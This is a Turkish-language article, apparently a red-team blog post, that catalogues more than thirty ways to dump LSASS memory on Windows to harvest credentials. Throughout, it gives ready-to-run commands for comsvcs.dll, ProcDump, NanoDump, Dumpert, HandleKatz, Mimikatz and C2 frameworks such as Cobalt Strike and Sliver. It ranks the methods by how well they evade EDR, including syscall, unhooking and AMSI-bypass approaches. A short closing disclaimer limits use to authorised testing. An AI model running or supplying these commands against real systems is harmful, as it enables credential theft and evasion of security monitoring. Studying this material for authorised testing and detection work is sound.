Windows ortamlarında gerçekleştirilen sızma testlerinde en kritik adımlardan biri kimlik bilgisi elde etmektir (credential dumping). Bu süreçte hedef alınan temel bileşen ise LSASS (Local Security Authority Subsystem Service) sürecidir.
Bu yazıda; Red Team operasyonlarında ve penetrasyon testlerinde LSASS dump için kullanılan 30'dan fazla araç ve yöntemi kapsamlı biçimde ele alacağım.
LSASS Nedir, Neden Hedef Alınır?
lsass.exe, Windows işletim sisteminde kimlik doğrulama işlemlerini yöneten kritik bir sistem sürecidir. Kullanıcı oturum bilgileri, NTLM hash değerleri, Kerberos biletleri ve açık metin parolalar (belirli koşullar altında) bu sürecin belleğinde tutulur. Bu nedenle bir saldırgan için LSASS belleğine erişmek, ağdaki lateral movement ve privilege escalation için doğrudan bir yol açar.
Dump Yöntemleri
1. Task Manager (GUI — En Basit Yol)
# Lsass PID'ini bul
Powershell -ep bypass
Get-Process lsass
# Task Manager üzerinden dump al
C:\Windows\System32\Taskmgr.exe /dumpfile=C:\lsass.dmp /pid=<LSASS_PID>
En bilinen ve en kolay yöntem. Ancak EDR ürünleri tarafından hemen tespit edilir.
2. comsvcs.dll (LOLBin — Yaygın Kullanım)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump lsass.exe lsass.dmp full
Windows'un yerleşik DLL'ini kullanır, ekstra araç gerektirmez. Savunma araçları tarafından artık iyi bilinmektedir.
3. MiniDumpWriteDump (Win API)
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, lsass_pid);
MiniDumpWriteDump(hProcess, lsass_pid, hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL);
Windows Dbghelp API'si doğrudan kullanılır. Özel araç geliştirme senaryolarında tercih edilir.
4. ProcDump (Sysinternals)
procdump.exe -ma lsass.exe lsass.dmp
Microsoft imzalı meşru bir araçtır. Microsoft'un imzasını taşıdığı için başlangıçta güvenilir gibi görünse de artık çoğu EDR tarafından izlenmektedir.
5. FTK Imager
FTK Imager → Capture Memory → lsass.exe seçilir.
Adli bilişim (forensics) aracı olarak meşruiyeti yüksek, EDR atlatmada etkili olabilir.
6. Volatility (Bellek Analizi)
volatility -f memory_dump.raw --profile=Win7SP1x64 memdump -p <lsass_pid> -D <output_dir>
# Process ağacını görüntüle
volatility -f memory_dump.raw --profile=Win7SP1x64 pstree
Bellek imajından offline LSASS analizi için kullanılır. Özellikle incident response süreçlerinde tercih edilir.
7. WinPmem
winpmem.exe -o dump.raw
Fiziksel belleği diske yazar. Kernel düzeyinde çalışır.
8. Hiberfil.sys
windbg.exe -y srv*c:\symbols*http://msdl.microsoft.com/download/symbols -z C:\hiberfil.sys
!process 0 0 lsass.exe
.dump /ma <lsass_pid> <output_file>
Sistem hazırda bekleme (hibernate) dosyasından LSASS bellek alanını çıkarır.
9. Windows Error Reporting (WER)
HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps
-> DumpType -> 2
Ardından Lsass-Shtinkering.exe tetikleyici aracı çalıştırılır. WER mekanizmasını kötüye kullanarak dump üretir.
10. LiveKD
LiveKd.exe -w
!process 0 0 lsass.exe
.process /p [lsass_PID]
.dump /ma [dump_file_path]
Çalışan sistemi çökertmeden kernel-level dump alınabilir.
11. NanoDump
NanoDump.exe -t [process_ID] -o [output_file_path]
Signature-based tespiti atlatmak için dump'ı parçalara bölerek yazar.
12. Dumpert
Dumpert.exe -k lsass.exe -s -o lsass.dmp
Direct system call kullanarak EDR hook'larını atlar.
13. HandleKatz
HandleKatz.exe -p lsass.exe
HandleKatz.exe -p lsass.exe -o [handle_ID] -dump
LSASS handle'ını klonlayarak dolaylı erişim sağlar, doğrudan LSASS açmadan çalışır.
14. MirrorDump
.\MirrorDump.exe -f "NotLSASS.zip" -d "LegitLSAPlugin.dll" -l 1073741824
Özel bir LSA plugin DLL'i yükleyerek belleği aynalanmış şekilde çıkarır.
15. SharpMiniDump / MiniDump
SharpMiniDump.exe -p <lsass_process_id> -o lsass.dmp
MiniDump.exe /p <process_id> /o <output_file_name>
.NET tabanlı araçlar, C2 üzerinden execute-assembly ile kullanıma uygundur.
16. LsassSilentProcessExit
LsassSilentProcessExit.exe <PID of LSASS.exe> <DumpMode>
Windows Silent Process Exit mekanizmasını kullanarak LSASS'ı çökertir ve OS'un ürettiği dump dosyasını ele geçirir.
C2 Framework Entegrasyonları
Cobalt Strike
- SharpDump:
execute-assembly SharpDump - Mimikatz:
mimikatz_command sekurlsa::minidump - Schtasks: Zamanlanmış görev ile
comsvcs.dllkombinasyonu - Sysinternals:
load sysinternals→ Procexp → File → Save
Metasploit
use post/windows/gather/credentials/lsassy
set SESSION <session_ID>
run
Empire
Modules → credentials/mimikatz/lsass_dump
sekurlsa::minidump
Sliver
use lsass_dump
run
Brute Ratel C4
load kiwi
lsa_dump_sam
lsa_dump_secrets
PoshC2
Get-LsassDumpProcDump # MiniDumpWriteDump yöntemi
Get-LsassDumpNtQueryVirtualMemory # NtQueryVirtualMemory yöntemi
Get-LsassDumpBloodHound # BloodHound entegrasyonu
Covenant + SharpKatz
Create Task → Module → SharpKatz
Arguments → lsa_dump
17. SharpUnhooker + LsassUnhooker
LsassUnhooker.exe -r <output_file_path>
SharpUnhooker.exe inject --process lsass.exe --modulepath ReflectiveDLL.dll
SharpUnhooker.exe dump --process lsass.exe --output lsass_dump.bin
EDR'lerin API hook'larını kaldırarak dump alır. Tespitten kaçınmak için güçlü bir yaklaşım.
18. HashDump Araçları (Çoklu)
Kldumper.exe
laZagne_x64.exe
PwDump7.exe
QuarksPwDump.exe
SqlDumper.exe
Wce_x64.exe
SAMInside.exe
Her biri farklı bir kimlik deposunu (SAM, LSA Secrets, NTDS) hedef alan araçlardır.
19. BetterSafetyKatz
.\BetterSafetyKatz.exe
.\BetterSafetyKatz.exe '.\mimikatz_trunk.zip'
sekurlsa::minidump
Mimikatz'ın derlenmeden bellek üzerinde çalıştırılabilen, obfuscate edilmiş versiyonudur.
20. Mimikatz + Invoke-Obfuscation (PowerShell)
Import-Module PowerSploit
Invoke-Mimikatz -DumpCreds
PowerShell obfuscation katmanlarıyla tespitten kaçınılır. AMSI bypass ile birlikte kullanılır.
Özet
Araçların EDR tespit seviyeleri genel olarak şu şekilde sıralanabilir:
Tespit Riski Yüksek (Hemen Fark Edilir)
- Task Manager — LSASS handle'ını doğrudan açar, her EDR izler.
- comsvcs.dll — LOLBin yöntemi, imzası iyi bilinir.
- ProcDump — Microsoft imzalı olsa da artık izleme listesinde.
Tespit Riski Orta (Bağlama Göre Değişir)
- WinPmem / FTK Imager — Forensics araçları, bağlama göre şüpheli sayılabilir.
- Volatility — Genellikle offline analizde kullanılır, aktif tehdit değil.
- SharpMiniDump / MiniDump — .NET araçları, AMSI tarafından yakalanabilir.
Tespit Riski Düşük (EDR Bypass Odaklı)
- Dumpert — Direct syscall ile EDR hook'larını atlar.
- NanoDump — Dump'ı parçalı yazar, imza tabanlı tespiti zorlaştırır.
- HandleKatz — LSASS'ı doğrudan açmadan handle klonlar.
- MirrorDump — LSA plugin üzerinden belleği aynar.
- WER — İşletim sisteminin kendi mekanizmasını kullanır.
- SharpUnhooker — EDR hook'larını temizler, sonra dump alır.
Bu yazıdaki teknikler yalnızca yetkili penetrasyon testleri ve Red Team operasyonları kapsamında kullanılmalıdır. İzinsiz sistemlere uygulanması yasal suç teşkil eder.
Yeni teknik analizler ve saha notları için takipte kalın!
